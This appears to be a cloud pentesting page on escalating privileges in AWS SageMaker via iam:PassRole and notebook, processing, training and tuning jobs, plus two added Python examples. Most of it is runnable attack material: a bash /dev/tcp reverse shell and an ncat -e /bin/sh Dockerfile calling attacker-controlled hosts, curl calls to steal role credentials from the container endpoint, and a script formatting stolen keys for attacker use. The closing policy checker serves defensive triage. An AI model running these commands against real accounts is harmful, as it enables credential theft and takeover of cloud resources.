AWS - Sagemaker Privesc


iam:PassRole , sagemaker:CreateNotebookInstance, sagemaker:CreatePresignedNotebookInstanceUrl

Start by creating a notebook instance with the IAM role whose credentials you want attached to it:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

The response should contain a NotebookInstanceArn field holding the ARN of the newly launched notebook instance. Once the instance reaches the InService state (check with describe-notebook-instance, or wait with `aws sagemaker wait notebook-instance-in-service`), the create-presigned-notebook-instance-url API returns a URL that gives access to it from a browser:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Navigate to the URL in a browser and click `Open JupyterLab` in the top right, then in the "Launcher" tab scroll down to the "Other" section and click the "Terminal" button.

From that terminal it is now possible to read the IAM role's credentials from the instance metadata service (the AWS CLI running inside the notebook already uses that role).

Potential Impact: Privesc to the sagemaker service role specified.

sagemaker:CreatePresignedNotebookInstanceUrl

If there are already Jupyter notebook instances running in the account and you can list them with sagemaker:ListNotebookInstances (or learn their names any other way), you can generate a presigned URL for them, access them, and steal the credentials as shown in the previous technique.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Potential Impact: Privesc to the sagemaker service role attached to the notebook instance.

sagemaker:CreateProcessingJob,iam:PassRole

An attacker with those permissions can make SageMaker run a processing job with a SageMaker role attached to it. The attacker chooses the container definition that will run on an AWS-managed instance, and can therefore steal the credentials of the attached IAM role from inside the container.

# I uploaded a python docker image to the ECR (ImageUri must point to an image that already exists in ECR)
# Set <YOUR-IP-OR-DOMAIN> and <YOUR-PORT> to a listener you control
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<account_id>.dkr.ecr.<region>.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/<YOUR-IP-OR-DOMAIN>/<YOUR-PORT> 0>&1\\\"\"]}" \
--role-arn <sagemaker-role-arn>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Potential Impact: Privesc to the sagemaker service role specified.

sagemaker:CreateTrainingJob, iam:PassRole

An attacker with those permissions will be able to create a training job that runs an arbitrary container with a role attached to it, and so steal that role's credentials.

This scenario is harder to exploit than the previous one because you need to build a Docker image that sends a reverse shell or the credentials directly to the attacker (you can't specify a start command in the training job configuration).

# Create docker image
mkdir /tmp/rev
## Note that the training job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR (the target repository has to exist before the push)
aws ecr create-repository --repository-name reverseshell --region <region>
aws ecr get-login-password --region <region> | sudo docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
# Create training job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Potential Impact: Privesc to the sagemaker service role specified.
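
The processing-job and training-job techniques above both end with a curl to the container credentials endpoint at http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. As an added example (Python, not code from the original page), the helper below builds that URL from the environment variable, parses the JSON the endpoint returns and produces the export lines for the stolen credentials together with their remaining lifetime. SAMPLE_RESPONSE is a constructed body with placeholder values, not one captured from a real account, and fetch_credentials only works when run inside the job container.

```python
"""Added example: turn the container credentials endpoint response into usable env vars.

Inside a SageMaker processing or training job container the passed role's
credentials are served at http://169.254.170.2 + $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.
SAMPLE_RESPONSE is a constructed body, not one captured from a real account.
"""
import json
import os
import shlex
import urllib.request
from datetime import datetime, timezone

CREDENTIALS_HOST = "http://169.254.170.2"

# Constructed sample of the endpoint's JSON (all values are placeholders).
SAMPLE_RESPONSE = json.dumps({
    "RoleArn": "arn:aws:iam::123456789012:role/service-role/AmazonSageMaker-ExecutionRole-example",
    "AccessKeyId": "ASIAEXAMPLE123",
    "SecretAccessKey": "wJalrExampleSecretKey",
    "Token": "IQoJb3JpZ2luX2VjEXAMPLE",
    "Expiration": "2030-01-01T00:00:00Z",
})


def credentials_url(relative_uri):
    """Full credentials URL from the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI value."""
    if not relative_uri.startswith("/"):
        raise ValueError("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI must start with '/'")
    return CREDENTIALS_HOST + relative_uri


def fetch_credentials(relative_uri, timeout=5):
    """Read the JSON body from the endpoint (only reachable inside the job container)."""
    with urllib.request.urlopen(credentials_url(relative_uri), timeout=timeout) as resp:
        return resp.read().decode()


def parse_credentials(body):
    """Return (env var dict, expiration as an aware datetime, role ARN or None)."""
    data = json.loads(body)
    env = {
        "AWS_ACCESS_KEY_ID": data["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": data["SecretAccessKey"],
        "AWS_SESSION_TOKEN": data["Token"],
    }
    expires = datetime.fromisoformat(data["Expiration"].replace("Z", "+00:00"))
    return env, expires, data.get("RoleArn")


def export_lines(env):
    """Shell export lines, quoted so tokens with unusual characters paste safely."""
    return ["export %s=%s" % (name, shlex.quote(value)) for name, value in env.items()]


def seconds_remaining(expires, now_iso=None):
    """Seconds until the credentials expire; pass an ISO timestamp to evaluate at a fixed instant."""
    now = (datetime.fromisoformat(now_iso.replace("Z", "+00:00")) if now_iso
           else datetime.now(timezone.utc))
    return int((expires - now).total_seconds())


if __name__ == "__main__":
    rel = os.environ.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI")
    body = fetch_credentials(rel) if rel else SAMPLE_RESPONSE
    env, expires, role = parse_credentials(body)
    print("# role:", role, "| expires in", seconds_remaining(expires), "s")
    print("\n".join(export_lines(env)))
```

Run it inside the container (or pipe the curl output through it) and paste the export lines into a shell on the attacker side; the session token expires, so the remaining lifetime tells you how long you have before you need to pull the credentials again.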

sagemaker:CreateHyperParameterTuningJob, iam:PassRole

An attacker with those permissions will (potentially) be able to create a hyperparameter tuning job, running an arbitrary container on it with a role attached. I haven't exploited it due to lack of time, but it looks like the previous exploits; feel free to send a PR with the exploitation details.
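
As an added example (Python, not part of the original page): an offline checker that takes an IAM policy document and reports which of the privesc paths described on this page its permissions enable. The permission sets are exactly the ones in the section headings above; SAMPLE_POLICY is constructed for the demo. The checker ignores Condition blocks and only looks at Resource scoping for iam:PassRole, so it over-reports compared with a real policy evaluation, which is the right direction for a triage tool.

```python
"""Added example: flag IAM policies that enable the SageMaker privesc paths on this page.

Simplifications: Condition blocks are ignored and Resource scoping is only
inspected for iam:PassRole, so a hit here means "worth a closer look", not
"definitely exploitable". SAMPLE_POLICY is constructed, not from a real account.
"""
import fnmatch
import json

# Permission sets copied from the section headings of this page.
PRIVESC_PATHS = {
    "notebook-instance": {"iam:PassRole", "sagemaker:CreateNotebookInstance",
                          "sagemaker:CreatePresignedNotebookInstanceUrl"},
    "presigned-url-existing-notebook": {"sagemaker:CreatePresignedNotebookInstanceUrl"},
    "processing-job": {"iam:PassRole", "sagemaker:CreateProcessingJob"},
    "training-job": {"iam:PassRole", "sagemaker:CreateTrainingJob"},
    "hyperparameter-tuning-job": {"iam:PassRole", "sagemaker:CreateHyperParameterTuningJob"},
}


def _as_list(value):
    """IAM allows a string or a list in Statement, Action and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching is case-insensitive and supports '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def granted_actions(policy, candidates):
    """Subset of `candidates` that some Allow statement grants and no Deny statement revokes."""
    allowed, denied = set(), set()
    for stmt in _as_list(policy.get("Statement")):
        effect = stmt.get("Effect")
        if effect not in ("Allow", "Deny"):
            continue
        patterns = _as_list(stmt.get("Action"))
        target = allowed if effect == "Allow" else denied
        for action in candidates:
            if any(_matches(p, action) for p in patterns):
                target.add(action)
    return allowed - denied


def passrole_on_any_resource(policy):
    """True if an Allow statement grants iam:PassRole on Resource '*' (any role can be passed)."""
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        grants_passrole = any(_matches(p, "iam:PassRole") for p in _as_list(stmt.get("Action")))
        if grants_passrole and "*" in _as_list(stmt.get("Resource")):
            return True
    return False


def sagemaker_privesc_paths(policy):
    """Sorted names of the paths above for which every required action is granted."""
    needed = set().union(*PRIVESC_PATHS.values())
    have = granted_actions(policy, needed)
    return sorted(name for name, perms in PRIVESC_PATHS.items() if perms <= have)


# Constructed sample: broad sagemaker:Create* plus unscoped PassRole, with one explicit Deny.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["sagemaker:Create*", "sagemaker:List*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    {"Effect": "Deny",  "Action": "sagemaker:CreateNotebookInstance", "Resource": "*"}
  ]
}""")

if __name__ == "__main__":
    for path in sagemaker_privesc_paths(SAMPLE_POLICY):
        print("privesc path enabled:", path)
    print("iam:PassRole on any role:", passrole_on_any_resource(SAMPLE_POLICY))
```

On the sample policy the Deny removes only the create-notebook path; the other four remain because `sagemaker:Create*` covers the job-creation actions and iam:PassRole is unscoped. Scoping iam:PassRole to specific role ARNs (and adding an iam:PassedToService condition) is what actually closes these paths, which is why the checker reports that separately.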
